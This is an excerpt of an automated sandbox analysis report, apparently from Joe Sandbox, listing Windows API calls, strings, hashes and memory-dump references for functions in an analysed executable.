                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Detected restart. Removing temporary directory.
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1717587489-3199836293
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e611eeaa9fed28cadb8c69ef2edffd8a52967f1f4ce985551ff58b7f7fd4f302
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 93f06bea8fcfa1b224d7ac257058da4e76460d04d1e35911cc499d3d1c0dfa98
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e611eeaa9fed28cadb8c69ef2edffd8a52967f1f4ce985551ff58b7f7fd4f302
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51E0553120C3002EDA02B7B2BC52A2F7F8CD701728311083BF40882452C43D1810C77D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004756F3), ref: 004754E1
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004756F3), ref: 004754F8
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                                                                                                                  • String ID: CreateFile
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2528220319-823142352
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 40c84172ef643bf56fca3451ce3bde360ac6963f3f9a8be57c20d0983807ed04
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 40e201e46ebb19b1d9bf90fbf766f72b309683208074062896c4944ddf319cda
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40c84172ef643bf56fca3451ce3bde360ac6963f3f9a8be57c20d0983807ed04
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CDE065702403447FDA10F769CCC6F4577889B14729F10C155B5446F3D2C5B9EC408628
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Open
                                                                                                                                                                                                                                                                                                                                                                  • String ID: System\CurrentControlSet\Control\Windows$c6H
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 71445658-1548894351
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 532c08fc3a5ebe879a42036bede715a90f251433598981f36561c2967c82051c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b14c86e398362f8621ba381b59967aff518ca924b2daa5b46ce173f8349262a2
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 532c08fc3a5ebe879a42036bede715a90f251433598981f36561c2967c82051c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BFD0C772950128BBDB00DA89DC41DFB775DDB15760F45441BFD049B141C1B4EC5197F8
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00498586), ref: 0040334B
                                                                                                                                                                                                                                                                                                                                                                  • GetCommandLineA.KERNEL32(00000000,00498586), ref: 00403356
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CommandHandleLineModule
                                                                                                                                                                                                                                                                                                                                                                  • String ID: 6f
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2123368496-3388785028
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ff8fa06d391bd0b31f892a344b3e95d40f530220570fde7b1ba7fad45aeb04f1
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45C002609013058AD754AF7579467162A94D751349F80447FF114BA3E1D77C82055BDD
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1458359878-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e53a20fce1e019891887c2340ded25f3f61bd14eb2329f15f37d70df2aaf943f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a2606c7dd4c17da0a3c90c20a229de96912268129783a4208f21052e6a4fbdd3
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e53a20fce1e019891887c2340ded25f3f61bd14eb2329f15f37d70df2aaf943f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62F02436B01D64578F20A59E998193F63DDEA94376750013BFC0CDB303D438CC098AA9
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%